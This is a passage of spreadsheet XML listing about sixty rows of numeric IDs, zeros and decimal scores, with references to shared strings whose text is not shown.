      <c r="C206">
        <v>4304</v>
      </c>
      <c r="D206">
        <v>0</v>
      </c>
      <c r="E206">
        <v>0.68229997158050537</v>
      </c>
      <c r="F206" t="s">
        <v>7</v>
      </c>
      <c r="G206" t="s">
        <v>412</v>
      </c>
      <c r="H206" t="s">
        <v>413</v>
      </c>
    </row>
    <row r="207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A207" s="1">
        <v>205</v>
      </c>
      <c r="B207">
        <v>2399</v>
      </c>
      <c r="C207">
        <v>2399</v>
      </c>
      <c r="D207">
        <v>0</v>
      </c>
      <c r="E207">
        <v>0.5964999794960022</v>
      </c>
      <c r="F207" t="s">
        <v>7</v>
      </c>
      <c r="G207" t="s">
        <v>414</v>
      </c>
      <c r="H207" t="s">
        <v>415</v>
      </c>
    </row>
    <row r="208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A208" s="1">
        <v>206</v>
      </c>
      <c r="B208">
        <v>2401</v>
      </c>
      <c r="C208">
        <v>2401</v>
      </c>
      <c r="D208">
        <v>0</v>
      </c>
      <c r="E208">
        <v>0.99589997529983521</v>
      </c>
      <c r="F208" t="s">
        <v>7</v>
      </c>
      <c r="G208" t="s">
        <v>416</v>
      </c>
      <c r="H208" t="s">
        <v>417</v>
      </c>
    </row>
    <row r="209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A209" s="1">
        <v>207</v>
      </c>
      <c r="B209">
        <v>2402</v>
      </c>
      <c r="C209">
        <v>2402</v>
      </c>
      <c r="D209">
        <v>0</v>
      </c>
      <c r="E209">
        <v>0.7839999794960022</v>
      </c>
      <c r="F209" t="s">
        <v>7</v>
      </c>
      <c r="G209" t="s">
        <v>418</v>
      </c>
      <c r="H209" t="s">
        <v>419</v>
      </c>
    </row>
    <row r="210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A210" s="1">
        <v>208</v>
      </c>
      <c r="B210">
        <v>4296</v>
      </c>
      <c r="C210">
        <v>4296</v>
      </c>
      <c r="D210">
        <v>0</v>
      </c>
      <c r="E210">
        <v>0.5756000280380249</v>
      </c>
      <c r="F210" t="s">
        <v>7</v>
      </c>
      <c r="G210" t="s">
        <v>420</v>
      </c>
      <c r="H210" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A211" s="1">
        <v>209</v>
      </c>
      <c r="B211">
        <v>6097</v>
      </c>
      <c r="C211">
        <v>6097</v>
      </c>
      <c r="D211">
        <v>0</v>
      </c>
      <c r="E211">
        <v>0.89240002632141113</v>
      </c>
      <c r="F211" t="s">
        <v>7</v>
      </c>
      <c r="G211" t="s">
        <v>422</v>
      </c>
      <c r="H211" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A212" s="1">
        <v>210</v>
      </c>
      <c r="B212">
        <v>2408</v>
      </c>
      <c r="C212">
        <v>2408</v>
      </c>
      <c r="D212">
        <v>0</v>
      </c>
      <c r="E212">
        <v>0.48379999399185181</v>
      </c>
      <c r="F212" t="s">
        <v>7</v>
      </c>
      <c r="G212" t="s">
        <v>424</v>
      </c>
      <c r="H212" t="s">
        <v>425</v>
      </c>
    </row>
    <row r="213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A213" s="1">
        <v>211</v>
      </c>
      <c r="B213">
        <v>4293</v>
      </c>
      <c r="C213">
        <v>4293</v>
      </c>
      <c r="D213">
        <v>0</v>
      </c>
      <c r="E213">
        <v>0.52209997177124023</v>
      </c>
      <c r="F213" t="s">
        <v>7</v>
      </c>
      <c r="G213" t="s">
        <v>426</v>
      </c>
      <c r="H213" t="s">
        <v>427</v>
      </c>
    </row>
    <row r="214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A214" s="1">
        <v>212</v>
      </c>
      <c r="B214">
        <v>4292</v>
      </c>
      <c r="C214">
        <v>4292</v>
      </c>
      <c r="D214">
        <v>0</v>
      </c>
      <c r="E214">
        <v>0.53179997205734253</v>
      </c>
      <c r="F214" t="s">
        <v>7</v>
      </c>
      <c r="G214" t="s">
        <v>428</v>
      </c>
      <c r="H214" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A215" s="1">
        <v>213</v>
      </c>
      <c r="B215">
        <v>2414</v>
      </c>
      <c r="C215">
        <v>2414</v>
      </c>
      <c r="D215">
        <v>0</v>
      </c>
      <c r="E215">
        <v>0.98949998617172241</v>
      </c>
      <c r="F215" t="s">
        <v>7</v>
      </c>
      <c r="G215" t="s">
        <v>430</v>
      </c>
      <c r="H215" t="s">
        <v>431</v>
      </c>
    </row>
    <row r="216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A216" s="1">
        <v>214</v>
      </c>
      <c r="B216">
        <v>2417</v>
      </c>
      <c r="C216">
        <v>2417</v>
      </c>
      <c r="D216">
        <v>0</v>
      </c>
      <c r="E216">
        <v>0.99910002946853638</v>
      </c>
      <c r="F216" t="s">
        <v>7</v>
      </c>
      <c r="G216" t="s">
        <v>432</v>
      </c>
      <c r="H216" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A217" s="1">
        <v>215</v>
      </c>
      <c r="B217">
        <v>2418</v>
      </c>
      <c r="C217">
        <v>2418</v>
      </c>
      <c r="D217">
        <v>0</v>
      </c>
      <c r="E217">
        <v>0.99940001964569092</v>
      </c>
      <c r="F217" t="s">
        <v>7</v>
      </c>
      <c r="G217" t="s">
        <v>434</v>
      </c>
      <c r="H217" t="s">
        <v>435</v>
      </c>
    </row>
    <row r="218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A218" s="1">
        <v>216</v>
      </c>
      <c r="B218">
        <v>4289</v>
      </c>
      <c r="C218">
        <v>4289</v>
      </c>
      <c r="D218">
        <v>0</v>
      </c>
      <c r="E218">
        <v>0.99919998645782471</v>
      </c>
      <c r="F218" t="s">
        <v>7</v>
      </c>
      <c r="G218" t="s">
        <v>436</v>
      </c>
      <c r="H218" t="s">
        <v>437</v>
      </c>
    </row>
    <row r="219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A219" s="1">
        <v>217</v>
      </c>
      <c r="B219">
        <v>2421</v>
      </c>
      <c r="C219">
        <v>2421</v>
      </c>
      <c r="D219">
        <v>0</v>
      </c>
      <c r="E219">
        <v>0.59200000762939453</v>
      </c>
      <c r="F219" t="s">
        <v>7</v>
      </c>
      <c r="G219" t="s">
        <v>438</v>
      </c>
      <c r="H219" t="s">
        <v>439</v>
      </c>
    </row>
    <row r="220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A220" s="1">
        <v>218</v>
      </c>
      <c r="B220">
        <v>6845</v>
      </c>
      <c r="C220">
        <v>6845</v>
      </c>
      <c r="D220">
        <v>0</v>
      </c>
      <c r="E220">
        <v>0.95179998874664307</v>
      </c>
      <c r="F220" t="s">
        <v>7</v>
      </c>
      <c r="G220" t="s">
        <v>440</v>
      </c>
      <c r="H220" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A221" s="1">
        <v>219</v>
      </c>
      <c r="B221">
        <v>2384</v>
      </c>
      <c r="C221">
        <v>2384</v>
      </c>
      <c r="D221">
        <v>0</v>
      </c>
      <c r="E221">
        <v>0.428600013256073</v>
      </c>
      <c r="F221" t="s">
        <v>7</v>
      </c>
      <c r="G221" t="s">
        <v>442</v>
      </c>
      <c r="H221" t="s">
        <v>443</v>
      </c>
    </row>
    <row r="222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A222" s="1">
        <v>220</v>
      </c>
      <c r="B222">
        <v>4315</v>
      </c>
      <c r="C222">
        <v>4315</v>
      </c>
      <c r="D222">
        <v>0</v>
      </c>
      <c r="E222">
        <v>0.99129998683929443</v>
      </c>
      <c r="F222" t="s">
        <v>7</v>
      </c>
      <c r="G222" t="s">
        <v>444</v>
      </c>
      <c r="H222" t="s">
        <v>445</v>
      </c>
    </row>
    <row r="223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A223" s="1">
        <v>221</v>
      </c>
      <c r="B223">
        <v>2381</v>
      </c>
      <c r="C223">
        <v>2381</v>
      </c>
      <c r="D223">
        <v>0</v>
      </c>
      <c r="E223">
        <v>0.97229999303817749</v>
      </c>
      <c r="F223" t="s">
        <v>7</v>
      </c>
      <c r="G223" t="s">
        <v>446</v>
      </c>
      <c r="H223" t="s">
        <v>447</v>
      </c>
    </row>
    <row r="224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A224" s="1">
        <v>222</v>
      </c>
      <c r="B224">
        <v>2347</v>
      </c>
      <c r="C224">
        <v>2347</v>
      </c>
      <c r="D224">
        <v>0</v>
      </c>
      <c r="E224">
        <v>0.70420002937316895</v>
      </c>
      <c r="F224" t="s">
        <v>7</v>
      </c>
      <c r="G224" t="s">
        <v>448</v>
      </c>
      <c r="H224" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A225" s="1">
        <v>223</v>
      </c>
      <c r="B225">
        <v>4338</v>
      </c>
      <c r="C225">
        <v>4338</v>
      </c>
      <c r="D225">
        <v>0</v>
      </c>
      <c r="E225">
        <v>0.66860002279281616</v>
      </c>
      <c r="F225" t="s">
        <v>7</v>
      </c>
      <c r="G225" t="s">
        <v>450</v>
      </c>
      <c r="H225" t="s">
        <v>451</v>
      </c>
    </row>
    <row r="226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A226" s="1">
        <v>224</v>
      </c>
      <c r="B226">
        <v>4336</v>
      </c>
      <c r="C226">
        <v>4336</v>
      </c>
      <c r="D226">
        <v>0</v>
      </c>
      <c r="E226">
        <v>0.61959999799728394</v>
      </c>
      <c r="F226" t="s">
        <v>7</v>
      </c>
      <c r="G226" t="s">
        <v>452</v>
      </c>
      <c r="H226" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A227" s="1">
        <v>225</v>
      </c>
      <c r="B227">
        <v>2358</v>
      </c>
      <c r="C227">
        <v>2358</v>
      </c>
      <c r="D227">
        <v>0</v>
      </c>
      <c r="E227">
        <v>0.75050002336502075</v>
      </c>
      <c r="F227" t="s">
        <v>7</v>
      </c>
      <c r="G227" t="s">
        <v>454</v>
      </c>
      <c r="H227" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A228" s="1">
        <v>226</v>
      </c>
      <c r="B228">
        <v>6867</v>
      </c>
      <c r="C228">
        <v>6867</v>
      </c>
      <c r="D228">
        <v>0</v>
      </c>
      <c r="E228">
        <v>0.55629998445510864</v>
      </c>
      <c r="F228" t="s">
        <v>7</v>
      </c>
      <c r="G228" t="s">
        <v>456</v>
      </c>
      <c r="H228" t="s">
        <v>457</v>
      </c>
    </row>
    <row r="229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A229" s="1">
        <v>227</v>
      </c>
      <c r="B229">
        <v>6081</v>
      </c>
      <c r="C229">
        <v>6081</v>
      </c>
      <c r="D229">
        <v>0</v>
      </c>
      <c r="E229">
        <v>0.54030001163482666</v>
      </c>
      <c r="F229" t="s">
        <v>7</v>
      </c>
      <c r="G229" t="s">
        <v>458</v>
      </c>
      <c r="H229" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A230" s="1">
        <v>228</v>
      </c>
      <c r="B230">
        <v>4330</v>
      </c>
      <c r="C230">
        <v>4330</v>
      </c>
      <c r="D230">
        <v>0</v>
      </c>
      <c r="E230">
        <v>0.98970001935958862</v>
      </c>
      <c r="F230" t="s">
        <v>7</v>
      </c>
      <c r="G230" t="s">
        <v>460</v>
      </c>
      <c r="H230" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A231" s="1">
        <v>229</v>
      </c>
      <c r="B231">
        <v>6861</v>
      </c>
      <c r="C231">
        <v>6861</v>
      </c>
      <c r="D231">
        <v>0</v>
      </c>
      <c r="E231">
        <v>0.99510002136230469</v>
      </c>
      <c r="F231" t="s">
        <v>7</v>
      </c>
      <c r="G231" t="s">
        <v>462</v>
      </c>
      <c r="H231" t="s">
        <v>463</v>
      </c>
    </row>
    <row r="232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A232" s="1">
        <v>230</v>
      </c>
      <c r="B232">
        <v>4329</v>
      </c>
      <c r="C232">
        <v>4329</v>
      </c>
      <c r="D232">
        <v>0</v>
      </c>
      <c r="E232">
        <v>0.58950001001358032</v>
      </c>
      <c r="F232" t="s">
        <v>7</v>
      </c>
      <c r="G232" t="s">
        <v>464</v>
      </c>
      <c r="H232" t="s">
        <v>465</v>
      </c>
    </row>
    <row r="233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A233" s="1">
        <v>231</v>
      </c>
      <c r="B233">
        <v>6082</v>
      </c>
      <c r="C233">
        <v>6082</v>
      </c>
      <c r="D233">
        <v>0</v>
      </c>
      <c r="E233">
        <v>0.99830001592636108</v>
      </c>
      <c r="F233" t="s">
        <v>7</v>
      </c>
      <c r="G233" t="s">
        <v>466</v>
      </c>
      <c r="H233" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A234" s="1">
        <v>232</v>
      </c>
      <c r="B234">
        <v>6083</v>
      </c>
      <c r="C234">
        <v>6083</v>
      </c>
      <c r="D234">
        <v>0</v>
      </c>
      <c r="E234">
        <v>0.74299997091293335</v>
      </c>
      <c r="F234" t="s">
        <v>7</v>
      </c>
      <c r="G234" t="s">
        <v>468</v>
      </c>
      <c r="H234" t="s">
        <v>469</v>
      </c>
    </row>
    <row r="235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A235" s="1">
        <v>233</v>
      </c>
      <c r="B235">
        <v>4323</v>
      </c>
      <c r="C235">
        <v>4323</v>
      </c>
      <c r="D235">
        <v>0</v>
      </c>
      <c r="E235">
        <v>0.40759998559951782</v>
      </c>
      <c r="F235" t="s">
        <v>7</v>
      </c>
      <c r="G235" t="s">
        <v>470</v>
      </c>
      <c r="H235" t="s">
        <v>471</v>
      </c>
    </row>
    <row r="236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A236" s="1">
        <v>234</v>
      </c>
      <c r="B236">
        <v>2374</v>
      </c>
      <c r="C236">
        <v>2374</v>
      </c>
      <c r="D236">
        <v>0</v>
      </c>
      <c r="E236">
        <v>0.87419998645782471</v>
      </c>
      <c r="F236" t="s">
        <v>7</v>
      </c>
      <c r="G236" t="s">
        <v>472</v>
      </c>
      <c r="H236" t="s">
        <v>473</v>
      </c>
    </row>
    <row r="237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A237" s="1">
        <v>235</v>
      </c>
      <c r="B237">
        <v>2375</v>
      </c>
      <c r="C237">
        <v>2375</v>
      </c>
      <c r="D237">
        <v>0</v>
      </c>
      <c r="E237">
        <v>0.99260002374649048</v>
      </c>
      <c r="F237" t="s">
        <v>7</v>
      </c>
      <c r="G237" t="s">
        <v>474</v>
      </c>
      <c r="H237" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A238" s="1">
        <v>236</v>
      </c>
      <c r="B238">
        <v>2376</v>
      </c>
      <c r="C238">
        <v>2376</v>
      </c>
      <c r="D238">
        <v>0</v>
      </c>
      <c r="E238">
        <v>0.99830001592636108</v>
      </c>
      <c r="F238" t="s">
        <v>7</v>
      </c>
      <c r="G238" t="s">
        <v>476</v>
      </c>
      <c r="H238" t="s">
        <v>477</v>
      </c>
    </row>
    <row r="239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A239" s="1">
        <v>237</v>
      </c>
      <c r="B239">
        <v>2377</v>
      </c>
      <c r="C239">
        <v>2377</v>
      </c>
      <c r="D239">
        <v>0</v>
      </c>
      <c r="E239">
        <v>0.91699999570846558</v>
      </c>
      <c r="F239" t="s">
        <v>7</v>
      </c>
      <c r="G239" t="s">
        <v>478</v>
      </c>
      <c r="H239" t="s">
        <v>479</v>
      </c>
    </row>
    <row r="240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A240" s="1">
        <v>238</v>
      </c>
      <c r="B240">
        <v>4319</v>
      </c>
      <c r="C240">
        <v>4319</v>
      </c>
      <c r="D240">
        <v>0</v>
      </c>
      <c r="E240">
        <v>0.87010002136230469</v>
      </c>
      <c r="F240" t="s">
        <v>7</v>
      </c>
      <c r="G240" t="s">
        <v>480</v>
      </c>
      <c r="H240" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A241" s="1">
        <v>239</v>
      </c>
      <c r="B241">
        <v>4370</v>
      </c>
      <c r="C241">
        <v>4370</v>
      </c>
      <c r="D241">
        <v>0</v>
      </c>
      <c r="E241">
        <v>0.93300002813339233</v>
      </c>
      <c r="F241" t="s">
        <v>7</v>
      </c>
      <c r="G241" t="s">
        <v>482</v>
      </c>
      <c r="H241" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A242" s="1">
        <v>240</v>
      </c>
      <c r="B242">
        <v>5948</v>
      </c>
      <c r="C242">
        <v>5948</v>
      </c>
      <c r="D242">
        <v>0</v>
      </c>
      <c r="E242">
        <v>0.83880001306533813</v>
      </c>
      <c r="F242" t="s">
        <v>7</v>
      </c>
      <c r="G242" t="s">
        <v>484</v>
      </c>
      <c r="H242" t="s">
        <v>485</v>
      </c>
    </row>
    <row r="243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A243" s="1">
        <v>241</v>
      </c>
      <c r="B243">
        <v>2277</v>
      </c>
      <c r="C243">
        <v>2277</v>
      </c>
      <c r="D243">
        <v>0</v>
      </c>
      <c r="E243">
        <v>0.58060002326965332</v>
      </c>
      <c r="F243" t="s">
        <v>7</v>
      </c>
      <c r="G243" t="s">
        <v>486</v>
      </c>
      <c r="H243" t="s">
        <v>487</v>
      </c>
    </row>
    <row r="244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A244" s="1">
        <v>242</v>
      </c>
      <c r="B244">
        <v>2273</v>
      </c>
      <c r="C244">
        <v>2273</v>
      </c>
      <c r="D244">
        <v>0</v>
      </c>
      <c r="E244">
        <v>0.77380001544952393</v>
      </c>
      <c r="F244" t="s">
        <v>7</v>
      </c>
      <c r="G244" t="s">
        <v>488</v>
      </c>
      <c r="H244" t="s">
        <v>489</v>
      </c>
    </row>
    <row r="245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A245" s="1">
        <v>243</v>
      </c>
      <c r="B245">
        <v>6952</v>
      </c>
      <c r="C245">
        <v>6952</v>
      </c>
      <c r="D245">
        <v>0</v>
      </c>
      <c r="E245">
        <v>0.51709997653961182</v>
      </c>
      <c r="F245" t="s">
        <v>7</v>
      </c>
      <c r="G245" t="s">
        <v>490</v>
      </c>
      <c r="H245" t="s">
        <v>491</v>
      </c>
    </row>
    <row r="246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A246" s="1">
        <v>244</v>
      </c>
      <c r="B246">
        <v>2175</v>
      </c>
      <c r="C246">
        <v>2175</v>
      </c>
      <c r="D246">
        <v>0</v>
      </c>
      <c r="E246">
        <v>0.91439998149871826</v>
      </c>
      <c r="F246" t="s">
        <v>7</v>
      </c>
      <c r="G246" t="s">
        <v>492</v>
      </c>
      <c r="H246" t="s">
        <v>493</v>
      </c>
    </row>
    <row r="247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A247" s="1">
        <v>245</v>
      </c>
      <c r="B247">
        <v>6949</v>
      </c>
      <c r="C247">
        <v>6949</v>
      </c>
      <c r="D247">
        <v>0</v>
      </c>
      <c r="E247">
        <v>0.69480001926422119</v>
      </c>
      <c r="F247" t="s">
        <v>7</v>
      </c>
      <c r="G247" t="s">
        <v>494</v>
      </c>
      <c r="H247" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A248" s="1">
        <v>246</v>
      </c>
      <c r="B248">
        <v>2180</v>
      </c>
      <c r="C248">
        <v>2180</v>
      </c>
      <c r="D248">
        <v>0</v>
      </c>
      <c r="E248">
        <v>0.70929998159408569</v>
      </c>
      <c r="F248" t="s">
        <v>7</v>
      </c>
      <c r="G248" t="s">
        <v>496</v>
      </c>
      <c r="H248" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A249" s="1">
        <v>247</v>
      </c>
      <c r="B249">
        <v>2181</v>
      </c>
      <c r="C249">
        <v>2181</v>
      </c>
      <c r="D249">
        <v>0</v>
      </c>
      <c r="E249">
        <v>0.49599999189376831</v>
      </c>
      <c r="F249" t="s">
        <v>7</v>
      </c>
      <c r="G249" t="s">
        <v>498</v>
      </c>
      <c r="H249" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A250" s="1">
        <v>248</v>
      </c>
      <c r="B250">
        <v>4429</v>
      </c>
      <c r="C250">
        <v>4429</v>
      </c>
      <c r="D250">
        <v>0</v>
      </c>
      <c r="E250">
        <v>0.99900001287460327</v>
      </c>
      <c r="F250" t="s">
        <v>7</v>
      </c>
      <c r="G250" t="s">
        <v>500</v>
      </c>
      <c r="H250" t="s">
        <v>501</v>
      </c>
    </row>
    <row r="251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A251" s="1">
        <v>249</v>
      </c>
      <c r="B251">
        <v>4425</v>
      </c>
      <c r="C251">
        <v>4425</v>
      </c>
      <c r="D251">
        <v>0</v>
      </c>
      <c r="E251">
        <v>0.99870002269744873</v>
      </c>
      <c r="F251" t="s">
        <v>7</v>
      </c>
      <c r="G251" t="s">
        <v>502</v>
      </c>
      <c r="H251" t="s">
        <v>503</v>
      </c>
    </row>
    <row r="252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A252" s="1">
        <v>250</v>
      </c>
      <c r="B252">
        <v>2171</v>
      </c>
      <c r="C252">
        <v>2171</v>
      </c>
      <c r="D252">
        <v>0</v>
      </c>
      <c r="E252">
        <v>0.65299999713897705</v>
      </c>
      <c r="F252" t="s">
        <v>7</v>
      </c>
      <c r="G252" t="s">
        <v>504</v>
      </c>
      <c r="H252" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A253" s="1">
        <v>251</v>
      </c>
      <c r="B253">
        <v>2185</v>
      </c>
      <c r="C253">
        <v>2185</v>
      </c>
      <c r="D253">
        <v>0</v>
      </c>
      <c r="E253">
        <v>0.52929997444152832</v>
      </c>
      <c r="F253" t="s">
        <v>7</v>
      </c>
      <c r="G253" t="s">
        <v>506</v>
      </c>
      <c r="H253" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A254" s="1">
        <v>252</v>
      </c>
      <c r="B254">
        <v>4423</v>
      </c>
      <c r="C254">
        <v>4423</v>
      </c>
      <c r="D254">
        <v>0</v>
      </c>
      <c r="E254">
        <v>0.70990002155303955</v>
      </c>
      <c r="F254" t="s">
        <v>7</v>
      </c>
      <c r="G254" t="s">
        <v>508</v>
      </c>
      <c r="H254" t="s">
        <v>509</v>
      </c>
    </row>
    <row r="255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A255" s="1">
        <v>253</v>
      </c>
      <c r="B255">
        <v>6043</v>
      </c>
      <c r="C255">
        <v>6043</v>
      </c>
      <c r="D255">
        <v>0</v>
      </c>
      <c r="E255">
        <v>0.46389999985694891</v>
      </c>
      <c r="F255" t="s">
        <v>7</v>
      </c>
      <c r="G255" t="s">
        <v>510</v>
      </c>
      <c r="H255" t="s">
        <v>511</v>
      </c>
    </row>
    <row r="256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A256" s="1">
        <v>254</v>
      </c>
      <c r="B256">
        <v>6044</v>
      </c>
      <c r="C256">
        <v>6044</v>
      </c>
      <c r="D256">
        <v>0</v>
      </c>
      <c r="E256">
        <v>0.9603000283241272</v>
      </c>
      <c r="F256" t="s">
        <v>7</v>
      </c>
      <c r="G256" t="s">
        <v>512</v>
      </c>
      <c r="H256" t="s">
        <v>513</v>
      </c>
    </row>
    <row r="257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A257" s="1">
        <v>255</v>
      </c>
      <c r="B257">
        <v>4417</v>
      </c>
      <c r="C257">
        <v>4417</v>
      </c>
      <c r="D257">
        <v>0</v>
      </c>
      <c r="E257">
        <v>0.62089997529983521</v>
      </c>
      <c r="F257" t="s">
        <v>7</v>
      </c>
      <c r="G257" t="s">
        <v>514</v>
      </c>
      <c r="H257" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A258" s="1">
        <v>256</v>
      </c>
      <c r="B258">
        <v>6937</v>
      </c>
      <c r="C258">
        <v>6937</v>
      </c>
      <c r="D258">
        <v>0</v>
      </c>
      <c r="E258">
        <v>0.90939998626708984</v>
      </c>
      <c r="F258" t="s">
        <v>7</v>
      </c>
      <c r="G258" t="s">
        <v>516</v>
      </c>
      <c r="H258" t="s">
        <v>517</v>
      </c>
    </row>
    <row r="259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A259" s="1">
        <v>257</v>
      </c>
      <c r="B259">
        <v>4414</v>
      </c>
      <c r="C259">
        <v>4414</v>
      </c>
      <c r="D259">
        <v>0</v>
      </c>
      <c r="E259">
        <v>0.86669999361038208</v>
      </c>
      <c r="F259" t="s">
        <v>7</v>
      </c>
      <c r="G259" t="s">
        <v>518</v>
      </c>
      <c r="H259" t="s">
        <v>519</v>
      </c>
    </row>
    <row r="260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A260" s="1">
        <v>258</v>
      </c>
      <c r="B260">
        <v>6047</v>
      </c>
      <c r="C260">
        <v>6047</v>
      </c>
      <c r="D260">
        <v>0</v>
      </c>
      <c r="E260">
        <v>0.67820000648498535</v>
      </c>
      <c r="F260" t="s">
        <v>7</v>
      </c>
      <c r="G260" t="s">
        <v>520</v>
      </c>
      <c r="H260" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A261" s="1">
        <v>259</v>
      </c>
      <c r="B261">
        <v>4424</v>
      </c>
      <c r="C261">
        <v>4424</v>
      </c>
      <c r="D261">
        <v>0</v>
      </c>
      <c r="E261">
        <v>0.99550002813339233</v>
      </c>
      <c r="F261" t="s">
        <v>7</v>
      </c>
      <c r="G261" t="s">
        <v>522</v>
      </c>
      <c r="H261" t="s">
        <v>523</v>
      </c>
    </row>
    <row r="262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A262" s="1">
        <v>260</v>
      </c>
      <c r="B262">
        <v>2199</v>
      </c>
      <c r="C262">
        <v>2199</v>
      </c>
      <c r="D262">
        <v>0</v>
      </c>
      <c r="E262">
        <v>0.59560000896453857</v>
      </c>
      <c r="F262" t="s">
        <v>7</v>
      </c>
      <c r="G262" t="s">
        <v>524</v>
      </c>
      <c r="H262" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A263" s="1">
        <v>261</v>
      </c>
      <c r="B263">
        <v>4442</v>
      </c>
      <c r="C263">
        <v>4442</v>
      </c>
      <c r="D263">
        <v>0</v>
      </c>
      <c r="E263">
        <v>0.571399986743927</v>
      </c>
      <c r="F263" t="s">
        <v>7</v>
      </c>
      <c r="G263" t="s">
        <v>526</v>
      </c>
      <c r="H263" t="s">
        <v>527</v>
      </c>
    </row>
    <row r="264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A264" s="1">
        <v>262</v>
      </c>
      <c r="B264">
        <v>4444</v>
      </c>
      <c r="C264">
        <v>4444</v>
      </c>
      <c r="D264">
        <v>0</v>
      </c>
      <c r="E264">
        <v>0.75520002841949463</v>
      </c>
      <c r="F264" t="s">
        <v>7</v>
      </c>
      <c r="G264" t="s">
        <v>528</v>
      </c>
      <c r="H264" t="s">
        <v>529</v>
      </c>
    </row>
    <row r="265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A265" s="1">
        <v>263</v>
      </c>
      <c r="B265">
        <v>6981</v>
      </c>
      <c r="C265">
        <v>6981</v>
      </c>
      <c r="D265">
        <v>0</v>
      </c>
      <c r="E265">
        <v>0.50160002708435059</v>
      </c>
      <c r="F265" t="s">
        <v>7</v>
      </c>
      <c r="G265" t="s">
        <v>530</v>
      </c>
      <c r="H265" t="s">
        <v>531</v>
      </c>
    </row>
    <row r="266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A266" s="1">
        <v>264</v>
      </c>
      <c r="B266">
        <v>2136</v>
      </c>
      <c r="C266">
        <v>2136</v>
      </c>
      <c r="D266">
        <v>0</v>
      </c>
      <c r="E266">
        <v>0.49860000610351563</v>
      </c>
      <c r="F266" t="s">
        <v>7</v>
      </c>
      <c r="G266" t="s">
        <v>532</v>
      </c>
      <c r="H266" t="s">
        <v>533</v>
      </c>
    </row>
    <row r="267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A267" s="1">
        <v>265</v>
      </c>
      <c r="B267">
        <v>2137</v>
      </c>
      <c r="C267">
        <v>2137</v>
      </c>
      <c r="D267">
        <v>0</v>
      </c>
      <c r="E267">
        <v>0.99860000610351563</v>
      </c>
      <c r="F267" t="s">
        <v>7</v>
      </c>
      <c r="G267" t="s">
